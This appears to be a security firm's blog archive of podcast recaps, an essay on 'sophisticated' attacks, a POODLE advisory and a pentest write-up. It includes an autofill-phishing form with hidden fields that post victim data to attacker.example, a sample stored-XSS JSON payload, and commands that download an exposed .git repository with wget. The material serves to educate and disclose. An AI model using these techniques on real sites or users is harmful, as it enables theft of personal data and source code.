Category Archives: Vulnerabilities

#HackerKast 10 Bonus Round: Live Hack of Browser AutoComplete Function

While we were all recording HackerKast Episode 10 this week, we decided to add a little bonus footage with a bit more technical content instead of just news stories. We mastered the power of screen sharing on our video chat and decided to put it to use.

This week’s bonus footage features Jeremiah diving into the world of browser AutoComplete hacking. This isn’t a new topic by any means, but hackers get curious every once in a while, and Jeremiah decided to see if this bug was still around.

The premise is simple: you place a form on a website that you control and ask for the user’s name. When the user begins to type it, some browsers (Chrome and Safari are featured in the video) offer the convenience of auto-filling the form. The user, not feeling like typing their whole name out, lets the browser do it. What the user doesn’t see is the rest of the form fields, easily rendered invisible with simple CSS and named so that they grab the rest of the information from the browser’s AutoFill contact profile.

In the video, Jeremiah shows how it is possible, with a bit of tomfoolery and JavaScript, to grab things like an unsuspecting user’s phone number, birthday, address, and email just by having them start to type their name and letting AutoFill do the rest. This demo was done on Mac OS X using the latest versions of Safari and Chrome.
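
A minimal sketch of the kind of form involved looks something like this (the field names, autocomplete hints, and collection URL here are illustrative assumptions, not the actual demo code, which is linked below):

<form action="https://attacker.example/collect" method="POST">
  <!-- The only field the victim actually sees -->
  <input type="text" name="name" autocomplete="name" placeholder="Your name">
  <!-- Fields the browser may helpfully fill from its AutoFill profile,
       pushed off-screen with simple CSS so the victim never sees them -->
  <div style="position:absolute; left:-9999px;">
    <input type="text" name="email" autocomplete="email">
    <input type="text" name="phone" autocomplete="tel">
    <input type="text" name="address" autocomplete="street-address">
    <input type="text" name="birthday" autocomplete="bday">
  </div>
  <input type="submit" value="Continue">
</form>

When the victim accepts the autofill suggestion for the visible name field, the browser can also populate the hidden fields, and everything gets submitted together.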

Again, nothing new or revolutionary, but it’s still a scary attack that most users would fall for and be none the wiser as to what is going on.

We have posted the code to this particular hack on ha.ckers.org for anyone interested in testing it out.

Happy Hacking!

#HackerKast 10: XSS Vulnerability in jQuery, Let’s Encrypt, and Google Collects Personal Info

We kicked off this week’s episode chatting about a new XSS vulnerability that was uncovered in the very popular jQuery Validation Plugin. This plugin is widely used as a simple form validator, and the researcher, Sijmen Ruwhof, found the bug in the plugin’s CAPTCHA implementation. The bug was very widespread: a few Google dorks showed at least 12,000 websites easily identified as using it, and another 300,000 to 1 million websites potentially using it or similar vulnerable code. The part that amused all of us about this story was that Ruwhof disclosed the bug privately to both the author and to jQuery back in August and received no response. Some digging showed the bug had already been in OSVDB since 2013 with no action taken. After Ruwhof warned the plugin’s author again and published the research publicly, the bug was closed within 17 hours. A nice little case study on Full Disclosure.

Next, Jeremiah covered the launch of a new certificate authority called Let’s Encrypt. This kind of thing wouldn’t normally be news, since there are a ton of CAs out there already, but what makes Let’s Encrypt interesting is that it is a non-profit, *FREE* certificate authority. The project is backed by the EFF, Mozilla, Cisco, Akamai, IdenTrust, and University of Michigan researchers, and it focuses on being free and easy to use in order to lower the barrier to entry for encrypting your web traffic. Robert brings up a good question about browser support: if Microsoft or Google don’t support this right away, it really only helps the 20% or so of users on Firefox. The other question is what effect this will have on for-profit certificate authorities.

We of course had to mention the blog post that went somewhat viral recently about all the information Google is collecting about you. None of it was terribly surprising to those of us in this industry, but it was certainly eye-opening for a lot of people. You can easily look up the advertising profile Google has built on you, which was hilariously inaccurate for me and for a few others who posted their info online (contrary to popular belief, I’m not into Reggaeton). The creepy one for me, though, was the “Location History,” which was *extremely* precise.

These 6 links hitting the blogosphere had good timing, as Mozilla also announced that it will be switching Firefox’s default search engine to Yahoo. This is HUGE news considering that somewhere upwards of 95% of Mozilla’s revenue comes from Google paying to be the default engine. Firefox still has roughly 20% of browser market share, all of whom will be using significantly less Google these days.

Robert also dug up a story about a recent ruling from a judge in the United States that police may compel people to unlock devices protected by biometric authentication, but not by a password. For example, the judge held that it is perfectly legal for police to force you to use your fingerprint to unlock your iPhone, but not to force you to give up a four-digit PIN. This has all sorts of interesting implications for information security and personal privacy where law enforcement is concerned.

With absolutely no segue, we covered a new story about China, which seems to be one of Robert’s favorite topics. It turns out China released a list of a ton of newly blocked websites, and one that stood out was Edgecast. Edgecast is particularly interesting because on its own it isn’t a website worth noting, but it is a CDN, which means China has blocked all of its customers as well and could affect hundreds of thousands of sites. The comparison was made that this is like blocking Akamai. It will be fascinating to see what the repercussions are as this plays out.

We closed out this week chatting about some extra precautions we are all taking these days on the modern, dangerous web. Listen in for a few tips!

Resources:
Cross-site scripting in millions of websites
Let’s Encrypt – It’s free, automated and open
6 links that will show you what Google knows about you
After this judge’s ruling, do you finally see value in passwords?
China just blocked thousands of websites

5 Characteristics of a ‘Sophisticated’ Attack

When news breaks about a cyber-attack, the affected company will often [ab]use the word ‘sophisticated’ to describe the attack. Immediately upon hearing the word ‘sophisticated,’ many in the InfoSec community roll their eyes because the characterization is viewed as nothing more than hyperbole. The skepticism stems from a long history of incidents in which breach details show that the attacker gained entry using painfully common, even routine, and ultimately defensible methods (e.g. SQL Injection, brute force, phishing, password reuse, old and well-known vulnerabilities, etc.).

In cases of spin, the PR team of the breached company uses the word ‘sophisticated’ in an attempt to convey that the company did nothing wrong, that there was nothing it could have done to prevent the breach because the attack was not foreseeable or preventable by traditional means, and that it “takes security seriously,” so please don’t sue, stop shopping, or close your accounts.

One factor that allows this deflection to continue is the lack of a documented consensus across InfoSec on what constitutes a ‘sophisticated’ attack. Clearly, some attacks actually are sophisticated; Stuxnet comes to mind in that regard. Not too long ago I took up the cause and asked my Twitter followers, many tens of thousands of them, largely in the InfoSec community, what they considered to be a ‘sophisticated’ attack. The replies were fairly consistent. I distilled them down to a set of attack characteristics and have listed them below.

5 Characteristics of a ‘Sophisticated’ Attack:

  1. The adversary knew specifically what application they were going to attack and collected intelligence about their target.
  2. The adversary used the gathered intelligence to attack specific points in their target, and not just a random system on the network.
  3. The adversary bypassed multiple layers of strong defense mechanisms, which may include intrusion prevention systems, encryption, multi-factor authentication, anti-virus software, air-gapped networks, and on and on.
  4. The adversary chained multiple exploits to achieve their full compromise. A zero-day may have been used during the attack, but this alone does not denote sophistication. There must be some clever or unique technique that was used.
  5. If malware was used in the attack, then it had to be malware that would not have been detectable using up-to-date anti-virus, payload recognition, or other endpoint security software.

While improvements can and will be made here, if an attack exhibits most or all of these characteristics, it can be safely considered ‘sophisticated.’ If it does not display these characteristics and your PR team still [ab]uses the word ‘sophisticated,’ then we reserve the right to roll our eyes and call you out.

#HackerKast 8: Recap of JPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake for being cold in Texas, we started off this week’s HackerKast with some discussion about the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not one of their main webpages but a one-off, brochureware-type site used to promote and organize a company-sponsored running race.

This shift in attacker focus is something we in the AppSec world have taken notice of and realize we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, are either hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs on Security, who pointed out the value to attackers of targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points and cashing out. One major weakness pointed out here is that most of these services protect your reward points account with nothing more than a four-digit PIN, which has only 10,000 possible values. Robert makes a great point here: even if they move from four-digit PINs to a password system and make brute forcing more difficult, the bad guys will just update current malware strains to attack these types of accounts if they find value here.

Robert then talked about a new Tor onion-network version of Facebook that has been set up to allow some anonymous usage of Facebook. There is the obvious use case of people trying to browse at work without getting in trouble, but the more important use is for people in oppressive countries who want to get information out without worrying about prosecution and personal safety.

I brought up an interesting bug bounty write-up that was shared around the blogosphere this week by a researcher named Patrik, who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug, but it was certainly a cool one. The XSS was found by uploading a JSON file to Google Tag Manager, a Google service for managing SEO and marketing tags. All of the inputs in the Tag Manager interface were properly sanitized, but the service also allowed you to upload a JSON file containing additional configuration and tag values. That file was not sanitized, so an XSS payload could be stored via the file upload, making it persistent. Pretty juicy stuff!
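
To picture the bug class, here is a hypothetical, stripped-down example of the kind of uploaded configuration that could carry a payload (an illustration of an unsanitized value in an uploaded file, not Tag Manager’s actual file format):

{
  "tags": [
    { "name": "analytics-snippet", "value": "<script>alert(document.domain)</script>" }
  ]
}

If the web interface escapes anything you type, but the file-upload path stores values like this verbatim and later renders them into a page, the payload survives as stored XSS.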

Finally, we wrapped up by talking about Google some more, with a bypass of Gmail two-factor authentication. Specifically, the attack in question goes after the text-message implementation of 2FA rather than the authenticator app that Google puts out. There are a number of ways this can happen, but the most recent story involves attackers calling up mobile providers and social engineering their way into access to the victim’s text messages, grabbing the second-factor token and using it to help compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

#HackerKast 7: Drupal Compromise, Tor + Bitcoin Decloaking, Verizon’s ‘Perma-Cookie,’ and Formula One Racing

This week Jeremiah Grossman, Robert Hansen and Matt Johansen discuss the latest around the recent Drupal compromise, which affects any Drupal 7 site that was not patched prior to Oct. 15. Robert also takes us to the Circuit of the Americas track in Austin to talk a little about how combining Tor and Bitcoin can effectively decloak people and even allow attackers to steal all of a user’s bitcoins. Another topic of discussion this week: Verizon’s Unique Identifier Header, or UIDH (aka a ‘Perma-Cookie’), which can be read by any web server that you visit and used to build a profile of your internet habits.

Resources:
Assume ‘Every Drupal 7 Site Was Compromised’ Unless Patched By Oct. 15

Verizon’s ‘Perma-Cookie’ Is a Privacy-Killing Machine

Bitcoin Over Tor Isn’t a Good Idea

#HackerKast 6: Microsoft Takes Over No-IP, LASCON 2014 Wrap-up, Shopping Cart Software Security

This week Jeremiah Grossman, Robert Hansen and Matt Johansen talk about interesting news and talks out of LASCON, as well as Microsoft taking over the small dynamic DNS provider No-IP, and @mattjay gloats about taking the top spot in the recent WhiteHat HackerKombat competition with the most individual flags captured.

Resources:
How Microsoft Appointed Itself Sheriff of the Internet

‘Spam Nation’ Publisher Discloses Card Breach

#HackerKast 5: POODLE Attack, HackerKombat and Drupal SQLi Flaw

This week Jeremiah Grossman, Robert Hansen and Gabe Gumbs host HackerKast at Levi’s Stadium – the home of the SF 49ers – to discuss the recently announced POODLE attack on SSL 3.0 and a critical SQLi flaw affecting Drupal that is making headlines. WhiteHat’s 6th HackerKombat capture-the-flag competition will also stream LIVE on Twitch.tv.

Watch HackerKombat LIVE starting at 3 pm PT on 10/17:
http://www.twitch.tv/hackerkombat

Other Resources:
POODLE Attack Information:
https://blog.whitehatsec.com/what-you-need-to-know-about-poodlessl-3-0-vulnerability/
http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html
https://www.openssl.org/~bodo/ssl-poodle.pdf

Drupal SQLi Flaw Advisory:
https://www.drupal.org/SA-CORE-2014-005
http://news.techworld.com/security/3581251/drupal-releases-patch-for-severe-sql-injection-flaw/?olo=rss

What you need to know about POODLE/SSL 3.0 vulnerability

UPDATE – 10/16 12:45 p.m. PT: For users with Akamai sites, Akamai has made the following updates:

  • Akamai is going to be disabling SSLv3 and SSLv2 support on an aggressive timeline.
  • If SSLv3 support is necessary for legacy support, clients can be exempted upon request.
  • Users that utilize Akamai should contact Akamai for further details. Here are some Akamai blog posts that clients may find helpful:
    SSL is dead, long live TLS
    Excerpt: How POODLE happened

UPDATE – 10/15 7:15 p.m. PT: WhiteHat Security has added testing for the new POODLE attack. These vulnerabilities will be shown as ‘Insufficient Transport Layer Protection’ in the Sentinel interface. They will have the description ‘CVE-2014-3566 – POODLE Attack’. These tests will be run at the start of a new scan.

Google researchers yesterday released details of a new SSL vulnerability nicknamed the “POODLE Attack.” POODLE, which stands for Padding Oracle On Downgraded Legacy Encryption, is an attack that targets SSL version 3.0 and allows interception and compromise of supposedly secured data.

Only SSL version 3.0 is known to be affected by this exploit. Although SSL 3.0 is extremely outdated, connection failures cause many clients to fall back to older protocol versions in an attempt to establish a connection. Attackers can leverage this by forcing connection failures and reattempts until SSL 3.0 is used.

Disabling SSL 3.0 will fix the issue; however, unforeseen compatibility problems may surface on some sites. The Google researchers recommended supporting TLS_FALLBACK_SCSV, which prevents attackers from forcing a protocol downgrade. It’s also important to note that RC4 encryption has no padding and as such is not vulnerable to this specific attack, although RC4 has well-known issues of its own.
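
If you want to check whether one of your own servers still accepts SSL 3.0, one quick way (assuming an OpenSSL build that still includes SSLv3 client support) is to try to force an SSLv3 handshake:

openssl s_client -connect www.example.com:443 -ssl3

A completed handshake means SSLv3 is still enabled; a handshake failure is what you want to see. Disabling the protocol server-side is usually a one-line change; in nginx, for example, it would be something like:

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

Just be sure to test for legacy-client breakage before rolling a change like this out.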

WhiteHat Security is currently researching a check for the POODLE attack and will implement it as soon as possible.

If you want to protect yourself in your browser, disabling SSLv3 is easy, as Robert Graham at Errata Security has pointed out. On Chrome, Chromium and Aviator, use the command-line flag --ssl-version-min=tls1; on Firefox, set security.tls.version.min to 1. Mozilla also has an add-on available for disabling SSL 3.0 in Firefox. If you choose not to do this, please make sure you avoid unknown wireless connections until an official update is available for your browser.

We will continue to update this blog as more information about POODLE is known and as more information for our customers becomes available. If you have any questions please contact WhiteHat Customer Support at support@whitehatsec.com.

How I stole source code with Directory Indexing and Git

The keys to the kingdom pretty much always come down to acquiring source code for the web application you’re attacking from a blackbox perspective. This is a quick review of how I was able to get access to a particular client’s application source code using an extremely simple vulnerability: Directory Indexing. Interestingly enough, they also had a .git repository accessible at https://www.[redacted].com/.git/ (although the ‘why’ still baffles me). If you have access to this, you also have access to any commits and all logs that may exist in the repo.

The following screenshots are from a recreation of the environment run locally, which I mapped to http://demo.jkuskos.com via /etc/hosts. All client information has been redacted.

[Screenshot 1: the recreated demo environment]

First, I confirmed that Directory Indexing was enabled. You’ll see why this is great in a moment.

[Screenshot 2: directory indexing confirmed on the demo host]
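
For anyone recreating this, a quick command-line check for the same kind of exposure (shown here against the demo host) looks something like:

curl -s -o /dev/null -w "%{http_code}\n" http://demo.jkuskos.com/.git/
curl -s http://demo.jkuskos.com/.git/HEAD

A 200 on the directory with an HTML listing in the body means indexing is on; and even when indexing is off, being able to read .git/HEAD directly is a strong sign the repository itself is exposed.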

The easiest way to download everything is with a recursive wget (you simply need to set the -r flag):

wget -r http://demo.jkuskos.com/.git/

[Screenshot 3: wget recursively downloading the .git directory]

Now let’s investigate. With the repository downloaded, we can run git commands against it.

[Screenshot 4: git listing the files tracked in the repository]

Now that we can see which files exist in the repository, accessing them is as simple as checking them out:

git checkout *.php; ls;

[Screenshot 5: the checked-out PHP source files]
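
The checked-out files are not the only win. Because the entire object database came down with the repository, the commit history is browsable too, for example:

git log --oneline
git show HEAD

Old commits frequently contain credentials, connection strings, or debug code that was later “removed” but still lives on in the history.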

This example is clearly simplified; however, the real site allowed me to find several SQL injections and authorization bypasses that would have been cumbersome to find through dynamic blackbox testing alone. It also allowed me to find several files that would otherwise have been available only with the appropriate credentials. These types of flaws are easily found through static code analysis and much harder to find through a dynamic assessment alone. As a hacker, turning a blackbox penetration test into a whitebox penetration test is always a victory.